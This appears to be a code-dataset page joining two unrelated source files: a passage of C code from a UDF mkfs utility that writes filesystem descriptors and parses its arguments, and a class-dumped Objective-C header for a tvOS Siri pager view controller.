(void) strncpy((int8_t *)nsp->nsr_id, "TEA01", 5);
wtfs(nextblock, 8192, buf);
bzero(buf, MAXBSIZE);
/*
* Minimum length of volume sequences
*/
volseq_sectors = 16;
/*
* Round up to next 32K boundary for
* volume descriptor sequences
*/
nextblock = VOLSEQSTART;
bzero(buf, sectorsize);
mvds_loc = VOLSEQSTART;
rvds_loc = mvds_loc + volseq_sectors;
/*
* Primary Volume Descriptor
*/
/* LINTED */
pvdp = (struct pri_vol_desc *)buf;
tp = &pvdp->pvd_tag;
tp->tag_id = UD_PRI_VOL_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct pri_vol_desc) -
sizeof (struct tag);
pvdp->pvd_vdsn = 0;
pvdp->pvd_pvdn = 0;
setdstring(pvdp->pvd_vol_id, udfs_label, 32);
pvdp->pvd_vsn = 1;
pvdp->pvd_mvsn = 1;
pvdp->pvd_il = 2; /* Single-volume */
pvdp->pvd_mil = 3; /* Multi-volume */
pvdp->pvd_csl = 1; /* CS0 */
pvdp->pvd_mcsl = 1; /* CS0 */
(void) sprintf(vsibuf, "%08X", SWAP_32((uint32_t)mkfstime));
setdstring(pvdp->pvd_vsi, vsibuf, 128);
(void) strncpy(pvdp->pvd_vsi + 17, udfs_label, 128 - 17);
setcharspec(&pvdp->pvd_desc_cs, 0, osta_unicode);
setcharspec(&pvdp->pvd_exp_cs, 0, osta_unicode);
setextad(&pvdp->pvd_vol_abs, 0, 0);
setextad(&pvdp->pvd_vcn, 0, 0);
bzero(&pvdp->pvd_appl_id, sizeof (regid_t));
setstamp(&pvdp->pvd_time);
bcopy(&sunmicro, &pvdp->pvd_ii, sizeof (regid_t));
pvdp->pvd_flags = 0;
wtvolseq(tp, nextblock, nextblock + volseq_sectors);
nextblock++;
/*
* Implementation Use Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
iudp = (struct iuvd_desc *)buf;
tp = &iudp->iuvd_tag;
tp->tag_id = UD_IMPL_USE_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct iuvd_desc) -
sizeof (struct tag);
iudp->iuvd_vdsn = 0;
bcopy(&lvinfo, &iudp->iuvd_ii, sizeof (regid_t));
setcharspec(&iudp->iuvd_cset, 0, osta_unicode);
setdstring(iudp->iuvd_lvi, udfs_label, 128);
setdstring(iudp->iuvd_ifo1, "", 36);
setdstring(iudp->iuvd_ifo2, "", 36);
setdstring(iudp->iuvd_ifo3, "", 36);
/*
* info1,2,3 = user specified
*/
bcopy(&sunmicro, &iudp->iuvd_iid, sizeof (regid_t));
wtvolseq(tp, nextblock, nextblock + volseq_sectors);
nextblock++;
/*
* Partition Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
pp = (struct part_desc *)buf;
tp = &pp->pd_tag;
tp->tag_id = UD_PART_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct part_desc) -
sizeof (struct tag);
pp->pd_vdsn = 0;
pp->pd_pflags = 1; /* Allocated */
pp->pd_pnum = 0;
bcopy(&partid, &pp->pd_pcontents, sizeof (regid_t));
part_start = FIRSTAVDP + AVDPLEN;
part_len = fssize - part_start;
part_bmp_bytes = (part_len + NBBY - 1) / NBBY;
part_bmp_sectors = (part_bmp_bytes + SPACEMAP_OFF + sectorsize - 1) /
sectorsize;
pp->pd_part_start = part_start;
pp->pd_part_length = part_len;
pp->pd_acc_type = acctype;
nextlogblock = 0;
/*
* Do the partition header
*/
/* LINTED */
php = (struct phdr_desc *)&pp->pd_pc_use;
/*
* Set up unallocated space bitmap
*/
if (acctype == PART_ACC_RW || acctype == PART_ACC_OW) {
php->phdr_usb.sad_ext_len =
(part_bmp_bytes + SPACEMAP_OFF + sectorsize - 1) &
(~(sectorsize - 1));
php->phdr_usb.sad_ext_loc = nextlogblock;
part_unalloc = nextlogblock;
nextlogblock += part_bmp_sectors;
}
bcopy(&sunmicro, &pp->pd_ii, sizeof (regid_t));
wtvolseq(tp, nextblock, nextblock + volseq_sectors);
nextblock++;
/*
* Logical Volume Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
lvp = (struct log_vol_desc *)buf;
tp = &lvp->lvd_tag;
tp->tag_id = UD_LOG_VOL_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct log_vol_desc) -
sizeof (struct tag);
lvp->lvd_vdsn = 0;
setcharspec(&lvp->lvd_desc_cs, 0, osta_unicode);
setdstring(lvp->lvd_lvid, udfs_label, 128);
lvp->lvd_log_bsize = sectorsize;
bcopy(&udf_compliant, &lvp->lvd_dom_id, sizeof (regid_t));
lap = (long_ad_t *)&lvp->lvd_lvcu;
lap->lad_ext_len = FILESETLEN * sectorsize;
filesetblock = nextlogblock;
lap->lad_ext_loc = nextlogblock;
lap->lad_ext_prn = 0;
lvp->lvd_mtbl_len = 6;
lvp->lvd_num_pmaps = 1;
bcopy(&sunmicro, &lvp->lvd_ii, sizeof (regid_t));
/* LINTED */
pmp = (struct pmap_typ1 *)&lvp->lvd_pmaps;
pmp->map1_type = 1;
pmp->map1_length = 6;
pmp->map1_vsn = SWAP_16(1);
pmp->map1_pn = 0;
tp->tag_crc_len = (char *)(pmp + 1) - buf - sizeof (struct tag);
setextad(&lvp->lvd_int_seq_ext, INTSEQLEN, INTSEQSTART);
wtvolseq(tp, nextblock, nextblock + volseq_sectors);
nextblock++;
/*
* Unallocated Space Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
uap = (struct unall_spc_desc *)buf;
tp = &uap->ua_tag;
tp->tag_id = UD_UNALL_SPA_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
uap->ua_vdsn = 0;
uap->ua_nad = 0;
tp->tag_crc_len = (char *)uap->ua_al_dsc - buf - sizeof (struct tag);
wtvolseq(tp, nextblock, nextblock + volseq_sectors);
nextblock++;
/*
* Terminating Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
tdp = (struct term_desc *)buf;
tp = &tdp->td_tag;
tp->tag_id = UD_TERM_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct term_desc) -
sizeof (struct tag);
tp->tag_loc = nextblock;
wtvolseq(tp, nextblock, nextblock + volseq_sectors);
nextblock++;
/*
* Do the anchor volume descriptor
*/
if (nextblock > FIRSTAVDP) {
(void) fprintf(stdout,
gettext("Volume integrity sequence"
" descriptors too long\n"));
exit(32);
}
nextblock = FIRSTAVDP;
bzero(buf, sectorsize);
/* LINTED */
avp = (struct anch_vol_desc_ptr *)buf;
tp = &avp->avd_tag;
tp->tag_id = UD_ANCH_VOL_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct anch_vol_desc_ptr) -
sizeof (struct tag);
tp->tag_loc = nextblock;
setextad(&avp->avd_main_vdse,
volseq_sectors * sectorsize, mvds_loc);
setextad(&avp->avd_res_vdse,
volseq_sectors * sectorsize, rvds_loc);
bzero(buf2, sectorsize);
/* LINTED */
maketag(tp, (struct tag *)buf2);
wtfs(nextblock, sectorsize, buf2);
nextblock++;
tp->tag_loc = fssize;
/* LINTED */
maketag(tp, (struct tag *)buf2);
wtfs(fssize, sectorsize, buf2);
/*
* File Set Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
fsp = (struct file_set_desc *)&buf;
tp = &fsp->fsd_tag;
tp->tag_id = UD_FILE_SET_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct file_set_desc) -
sizeof (struct tag);
tp->tag_loc = nextlogblock;
setstamp(&fsp->fsd_time);
fsp->fsd_ilevel = 3;
fsp->fsd_mi_level = 3;
fsp->fsd_cs_list = 1;
fsp->fsd_mcs_list = 1;
fsp->fsd_fs_no = 0;
fsp->fsd_fsd_no = 0;
setcharspec(&fsp->fsd_lvidcs, 0, osta_unicode);
setdstring(fsp->fsd_lvid, udfs_label, 128);
setcharspec(&fsp->fsd_fscs, 0, osta_unicode);
setdstring(fsp->fsd_fsi, udfs_label, 32);
setdstring(fsp->fsd_cfi, "", 32);
setdstring(fsp->fsd_afi, "", 32);
lap = (long_ad_t *)&fsp->fsd_root_icb;
lap->lad_ext_len = sectorsize;
lap->lad_ext_loc = filesetblock + FILESETLEN;
lap->lad_ext_prn = 0;
bcopy(&udf_compliant, &fsp->fsd_did, sizeof (regid_t));
maketag(tp, tp);
wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
nextlogblock++;
/*
* Terminating Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
tdp = (struct term_desc *)buf;
tp = &tdp->td_tag;
tp->tag_id = UD_TERM_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct term_desc) -
sizeof (struct tag);
tp->tag_loc = nextlogblock;
maketag(tp, tp);
wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
nextlogblock++;
if (nextlogblock > filesetblock + FILESETLEN) {
(void) fprintf(stdout,
gettext("File set descriptor too long\n"));
exit(32);
}
nextlogblock = filesetblock + FILESETLEN;
/*
* Root File Entry
*/
bzero(buf, sectorsize);
/* LINTED */
fp = (struct file_entry *)&buf;
tp = &fp->fe_tag;
tp->tag_id = UD_FILE_ENTRY;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_loc = nextlogblock;
icb = &fp->fe_icb_tag;
icb->itag_prnde = 0;
icb->itag_strategy = STRAT_TYPE4;
icb->itag_param = 0; /* what does this mean? */
icb->itag_max_ent = 1;
icb->itag_ftype = FTYPE_DIRECTORY;
icb->itag_lb_loc = 0;
icb->itag_lb_prn = 0;
icb->itag_flags = ICB_FLAG_ARCHIVE;
fp->fe_uid = getuid();
fp->fe_gid = getgid();
fp->fe_perms = (0x1f << 10) | (0x5 << 5) | 0x5;
fp->fe_lcount = 1;
fp->fe_rec_for = 0;
fp->fe_rec_dis = 0;
fp->fe_rec_len = 0;
fp->fe_info_len = sizeof (struct file_id);
fp->fe_lbr = 1;
setstamp(&fp->fe_acc_time);
setstamp(&fp->fe_mod_time);
setstamp(&fp->fe_attr_time);
fp->fe_ckpoint = 1;
bcopy(&sunmicro, &fp->fe_impl_id, sizeof (regid_t));
fp->fe_uniq_id = 0;
fp->fe_len_ear = 0;
fp->fe_len_adesc = sizeof (short_ad_t);
/* LINTED */
sap = (short_ad_t *)(fp->fe_spec + fp->fe_len_ear);
sap->sad_ext_len = sizeof (struct file_id);
sap->sad_ext_loc = nextlogblock + 1;
rootfelen = (char *)(sap + 1) - buf;
tp->tag_crc_len = rootfelen - sizeof (struct tag);
maketag(tp, tp);
wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
nextlogblock++;
/*
* Root Directory
*/
bzero(buf, sectorsize);
/* LINTED */
fip = (struct file_id *)&buf;
tp = &fip->fid_tag;
tp->tag_id = UD_FILE_ID_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct file_id) -
sizeof (struct tag);
tp->tag_loc = nextlogblock;
fip->fid_ver = 1;
fip->fid_flags = FID_DIR | FID_PARENT;
fip->fid_idlen = 0;
fip->fid_iulen = 0;
fip->fid_icb.lad_ext_len = sectorsize; /* rootfelen; */
fip->fid_icb.lad_ext_loc = nextlogblock - 1;
fip->fid_icb.lad_ext_prn = 0;
maketag(tp, tp);
wtfs(nextlogblock + part_start, sectorsize, (char *)tp);
nextlogblock++;
/*
* Now do the space bitmaps
*/
if (part_unalloc >= 0) {
int size = sectorsize * part_bmp_sectors;
sbp = (struct space_bmap_desc *)malloc(size);
if (!sbp) {
(void) fprintf(stdout,
gettext("Can't allocate bitmap space\n"));
exit(32);
}
bzero((char *)sbp, sectorsize * part_bmp_sectors);
tp = &sbp->sbd_tag;
tp->tag_id = UD_SPA_BMAP_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = 0; /* Don't do CRCs on bitmaps */
tp->tag_loc = part_unalloc;
sbp->sbd_nbits = part_len;
sbp->sbd_nbytes = part_bmp_bytes;
maketag(tp, tp);
if (part_unalloc >= 0) {
int32_t i;
cp = (uint8_t *)sbp + SPACEMAP_OFF;
i = nextlogblock / NBBY;
cp[i++] = (0xff << (nextlogblock % NBBY)) & 0xff;
while (i < part_bmp_bytes)
cp[i++] = 0xff;
if (part_len % NBBY)
cp[--i] = (unsigned)0xff >>
(NBBY - part_len % NBBY);
wtfs(part_unalloc + part_start, size, (char *)tp);
}
free((char *)sbp);
}
/*
* Volume Integrity Descriptor
*/
nextblock = INTSEQSTART;
endblock = nextblock + INTSEQLEN / sectorsize;
/* LINTED */
lvip = (struct log_vol_int_desc *)&lvid;
tp = &lvip->lvid_tag;
tp->tag_id = UD_LOG_VOL_INT;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_loc = nextblock;
setstamp(&lvip->lvid_tstamp);
lvip->lvid_int_type = LOG_VOL_CLOSE_INT;
setextad(&lvip->lvid_nie, 0, 0);
lvip->lvid_npart = 1;
lvip->lvid_liu = 0x2e;
lvip->lvid_uniqid = MAXID + 1;
lvip->lvid_fst[0] = part_len - nextlogblock; /* Free space */
lvip->lvid_fst[1] = part_len; /* Size */
lviup = (struct lvid_iu *)&lvip->lvid_fst[2];
bcopy(&sunmicro, &lviup->lvidiu_regid, sizeof (regid_t));
lviup->lvidiu_nfiles = 0;
lviup->lvidiu_ndirs = 1;
lviup->lvidiu_mread = 0x102;
lviup->lvidiu_mwrite = 0x102;
lviup->lvidiu_maxwr = 0x150;
tp->tag_crc_len = sizeof (struct log_vol_int_desc) + lvip->lvid_liu -
sizeof (struct tag);
maketag(tp, tp);
wtfs(nextblock, sectorsize, (char *)tp);
nextblock++;
/*
* Terminating Descriptor
*/
bzero(buf, sectorsize);
/* LINTED */
tdp = (struct term_desc *)buf;
tp = &tdp->td_tag;
tp->tag_id = UD_TERM_DESC;
tp->tag_desc_ver = ecma_version;
tp->tag_sno = serialnum;
tp->tag_crc_len = sizeof (struct term_desc) - sizeof (struct tag);
tp->tag_loc = nextblock;
maketag(tp, tp);
wtfs(nextblock, sectorsize, (char *)tp);
nextblock++;
/* Zero out the rest of the LVI extent */
bzero(buf, sectorsize);
while (nextblock < endblock)
wtfs(nextblock++, sectorsize, buf);
}
/*
* read a block from the file system
*/
static void
rdfs(daddr_t bno, int size, char *bf)
{
int n, saverr;
if (llseek(fsi, (offset_t)bno * sectorsize, 0) < 0) {
saverr = errno;
(void) fprintf(stderr,
gettext("seek error on sector %ld: %s\n"),
bno, strerror(saverr));
exit(32);
}
n = read(fsi, bf, size);
if (n != size) {
saverr = errno;
(void) fprintf(stderr,
gettext("read error on sector %ld: %s\n"),
bno, strerror(saverr));
exit(32);
}
}
/*
* write a block to the file system
*/
static void
wtfs(daddr_t bno, int size, char *bf)
{
int n, saverr;
if (fso == -1)
return;
if (llseek(fso, (offset_t)bno * sectorsize, 0) < 0) {
saverr = errno;
(void) fprintf(stderr,
gettext("seek error on sector %ld: %s\n"),
bno, strerror(saverr));
exit(32);
}
if (Nflag)
return;
n = write(fso, bf, size);
if (n != size) {
saverr = errno;
(void) fprintf(stderr,
gettext("write error on sector %ld: %s\n"),
bno, strerror(saverr));
exit(32);
}
}
static void
usage()
{
(void) fprintf(stderr,
gettext("udfs usage: mkfs [-F FSType] [-V]"
" [-m] [-o options] special size(sectors)\n"));
(void) fprintf(stderr,
gettext(" -m : dump fs cmd line used to make"
" this partition\n"));
(void) fprintf(stderr,
gettext(" -V : print this command line and return\n"));
(void) fprintf(stderr,
gettext(" -o : udfs options: :psize=%d:label=%s\n"),
sectorsize, udfs_label);
(void) fprintf(stderr,
gettext("NOTE that all -o suboptions: must"
" be separated only by commas so as to\n"));
(void) fprintf(stderr,
gettext("be parsed as a single argument\n"));
exit(32);
}
/*ARGSUSED*/
static void
dump_fscmd(char *fsys, int fsi)
{
(void) printf(gettext("mkfs -F udfs -o "));
(void) printf("psize=%d,label=\"%s\" %s %d\n",
sectorsize, oldlabel, fsys, oldfssize);
}
/* number ************************************************************* */
/* */
/* Convert a numeric arg to binary */
/* */
/* Arg: big - maximum valid input number */
/* Global arg: string - pointer to command arg */
/* */
/* Valid forms: 123 | 123k | 123*123 | 123x123 */
/* */
/* Return: converted number */
/* */
/* ******************************************************************** */
static int32_t
number(long big, char *param)
{
char *cs;
int64_t n = 0;
int64_t cut = BIG;
int32_t minus = 0;
#define FOUND_MULT 0x1
#define FOUND_K 0x2
cs = string;
if (*cs == '-') {
minus = 1;
cs++;
}
n = 0;
while ((*cs != ' ') && (*cs != '\0') && (*cs != ',')) {
if ((*cs >= '0') && (*cs <= '9')) {
n = n * 10 + *cs - '0';
cs++;
} else if ((*cs == '*') || (*cs == 'x')) {
if (number_flags & FOUND_MULT) {
(void) fprintf(stderr,
gettext("mkfs: only one \"*\" "
"or \"x\" allowed\n"));
exit(2);
}
number_flags |= FOUND_MULT;
cs++;
string = cs;
n = n * number(big, param);
cs = string;
continue;
} else if (*cs == 'k') {
if (number_flags & FOUND_K) {
(void) fprintf(stderr,
gettext("mkfs: only one \"k\" allowed\n"));
exit(2);
}
number_flags |= FOUND_K;
n = n * 1024;
cs++;
continue;
} else {
(void) fprintf(stderr,
gettext("mkfs: bad numeric arg: \"%s\"\n"),
string);
exit(2);
}
}
if (n > cut) {
(void) fprintf(stderr,
gettext("mkfs: value for %s overflowed\n"), param);
exit(2);
}
if (minus) {
n = -n;
}
if ((n > big) || (n < 0)) {
(void) fprintf(stderr,
gettext("mkfs: argument %s out of range\n"), param);
exit(2);
}
string = cs;
return ((int32_t)n);
}
/* match ************************************************************** */
/* */
/* Compare two text strings for equality */
/* */
/* Arg: s - pointer to string to match with a command arg */
/* Global arg: string - pointer to command arg */
/* */
/* Return: 1 if match, 0 if no match */
/* If match, also reset `string' to point to the text */
/* that follows the matching text. */
/* */
/* ******************************************************************** */
static int
match(char *s)
{
char *cs;
cs = string;
while (*cs++ == *s) {
if (*s++ == '\0') {
goto true;
}
}
if (*s != '\0') {
return (0);
}
true:
cs--;
string = cs;
return (1);
}
static uint32_t
get_bsize()
{
struct dk_cinfo info;
struct fd_char fd_char;
struct dk_minfo dkminfo;
if (ioctl(fso, DKIOCINFO, &info) < 0) {
perror("mkfs DKIOCINFO ");
(void) fprintf(stdout,
gettext("DKIOCINFO failed using psize = 2048"
" for creating file-system\n"));
return (0);
}
switch (info.dki_ctype) {
case DKC_CDROM :
return (2048);
case DKC_SCSI_CCS :
if (ioctl(fso, DKIOCGMEDIAINFO, &dkminfo) != -1) {
if (dkminfo.dki_lbsize != 0 &&
POWEROF2(dkminfo.dki_lbsize / DEV_BSIZE) &&
dkminfo.dki_lbsize != DEV_BSIZE) {
fprintf(stderr,
gettext("The device sector size "
"%u is not supported by udfs!\n"),
dkminfo.dki_lbsize);
(void) close(fso);
exit(1);
}
}
/* FALLTHROUGH */
case DKC_INTEL82072 :
/* FALLTHROUGH */
case DKC_INTEL82077 :
/* FALLTHROUGH */
case DKC_DIRECT :
if (ioctl(fso, FDIOGCHAR, &fd_char) >= 0) {
return (fd_char.fdc_sec_size);
}
/* FALLTHROUGH */
case DKC_PCMCIA_ATA :
return (512);
default :
return (0);
}
}
/*
* Read in the volume sequences descriptors.
*/
static int
readvolseq()
{
struct tag *tp;
uint8_t *cp, *end;
int err;
struct pri_vol_desc *pvolp;
struct part_desc *partp;
struct log_vol_desc *logvp;
struct anch_vol_desc_ptr *avp;
char *main_vdbuf;
uint32_t nextblock;
avp = (struct anch_vol_desc_ptr *)malloc(sectorsize);
rdfs(FIRSTAVDP, sectorsize, (char *)avp);
tp = (struct tag *)avp;
err = verifytag(tp, FIRSTAVDP, tp, UD_ANCH_VOL_DESC);
if (err)
return (0);
main_vdbuf = malloc(avp->avd_main_vdse.ext_len);
if (main_vdbuf == NULL) {
(void) fprintf(stderr, gettext("Cannot allocate space for "
"volume sequences\n"));
exit(32);
}
rdfs(avp->avd_main_vdse.ext_loc, avp->avd_main_vdse.ext_len,
main_vdbuf);
end = (uint8_t *)main_vdbuf + avp->avd_main_vdse.ext_len;
nextblock = avp->avd_main_vdse.ext_loc;
for (cp = (uint8_t *)main_vdbuf; cp < end; cp += sectorsize,
nextblock++) {
/* LINTED */
tp = (struct tag *)cp;
err = verifytag(tp, nextblock, tp, 0);
if (err)
continue;
switch (tp->tag_id) {
case UD_PRI_VOL_DESC:
/* Bump serial number, according to spec. */
serialnum = tp->tag_sno + 1;
pvolp = (struct pri_vol_desc *)tp;
oldlabel = pvolp->pvd_vol_id + 1;
break;
case UD_ANCH_VOL_DESC:
avp = (struct anch_vol_desc_ptr *)tp;
break;
case UD_VOL_DESC_PTR:
break;
case UD_IMPL_USE_DESC:
break;
case UD_PART_DESC:
partp = (struct part_desc *)tp;
part_start = partp->pd_part_start;
part_len = partp->pd_part_length;
oldfssize = part_start + part_len;
break;
case UD_LOG_VOL_DESC:
logvp = (struct log_vol_desc *)tp;
break;
case UD_UNALL_SPA_DESC:
break;
case UD_TERM_DESC:
goto done;
break;
case UD_LOG_VOL_INT:
break;
default:
break;
}
}
done:
if (!partp || !logvp) {
return (0);
}
return (1);
}
uint32_t
get_last_block()
{
struct vtoc vtoc;
struct dk_cinfo dki_info;
if (ioctl(fsi, DKIOCGVTOC, (intptr_t)&vtoc) != 0) {
(void) fprintf(stderr, gettext("Unable to read VTOC\n"));
return (0);
}
if (vtoc.v_sanity != VTOC_SANE) {
(void) fprintf(stderr, gettext("Vtoc.v_sanity != VTOC_SANE\n"));
return (0);
}
if (ioctl(fsi, DKIOCINFO, (intptr_t)&dki_info) != 0) {
(void) fprintf(stderr,
gettext("Could not get the slice information\n"));
return (0);
}
if (dki_info.dki_partition > V_NUMPAR) {
(void) fprintf(stderr,
gettext("dki_info.dki_partition > V_NUMPAR\n"));
return (0);
}
return ((uint32_t)vtoc.v_part[dki_info.dki_partition].p_size);
}
|
lechium/tvOS144Headers
|
Applications/Siri/SRPagerViewController.h
|
//
// Generated by classdumpios 1.0.1 (64 bit) (iOS port by DreamDevLost)(Debug version compiled Sep 26 2020 13:48:20).
//
// Copyright (C) 1997-2019 <NAME>.
//
#import <UIKit/UIViewController.h>
#import "SRPagerViewDataSource-Protocol.h"
#import "SRPagerViewDelegate-Protocol.h"
@class NSArray, NSMutableArray, NSString, SRPagerView;
@protocol SRPagerViewControllerDelegate;
@interface SRPagerViewController : UIViewController <SRPagerViewDataSource, SRPagerViewDelegate>
{
NSMutableArray *_viewControllers; // 8 = 0x8
_Bool _textInputEnabled; // 16 = 0x10
UIViewController *_activePageViewController; // 24 = 0x18
id <SRPagerViewControllerDelegate> _delegate; // 32 = 0x20
}
- (void).cxx_destruct; // IMP=0x00000001000877cc
@property(nonatomic) __weak id <SRPagerViewControllerDelegate> delegate; // @synthesize delegate=_delegate;
@property(retain, nonatomic) UIViewController *activePageViewController; // @synthesize activePageViewController=_activePageViewController;
- (_Bool)_canShowWhileLocked; // IMP=0x0000000100087784
- (id)_viewControllerForPageView:(id)arg1; // IMP=0x00000001000875d8
- (void)pagerViewDidChangeTransitionState:(id)arg1; // IMP=0x0000000100087590
- (void)pagerView:(id)arg1 didActivatePageView:(id)arg2 oldActivePageView:(id)arg3; // IMP=0x0000000100087520
- (id)pagerView:(id)arg1 pageViewAtIndex:(long long)arg2; // IMP=0x00000001000874bc
- (long long)numberOfPageViewsInPagerView:(id)arg1; // IMP=0x00000001000874a4
@property(readonly, nonatomic) unsigned long long transitionState;
@property(nonatomic, getter=isPagingEnabled) _Bool pagingEnabled;
- (_Bool)containsPageViewController:(id)arg1; // IMP=0x00000001000873a0
- (void)setActivePageViewController:(id)arg1 animated:(_Bool)arg2; // IMP=0x0000000100087284
- (void)removePageViewController:(id)arg1; // IMP=0x00000001000871a4
- (void)addPageViewController:(id)arg1; // IMP=0x0000000100087138
- (void)insertPageViewController:(id)arg1 atIndex:(long long)arg2; // IMP=0x000000010008704c
@property(readonly, nonatomic) NSArray *pageViewControllers;
- (void)viewDidLoad; // IMP=0x0000000100086f74
- (void)loadView; // IMP=0x0000000100086f08
- (id)initWithTextInputEnabled:(_Bool)arg1; // IMP=0x0000000100086e7c
// Remaining properties
@property(readonly, copy) NSString *debugDescription;
@property(readonly, copy) NSString *description;
@property(readonly) unsigned long long hash;
@property(readonly) Class superclass;
@property(retain, nonatomic) SRPagerView *view; // @dynamic view;
@end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.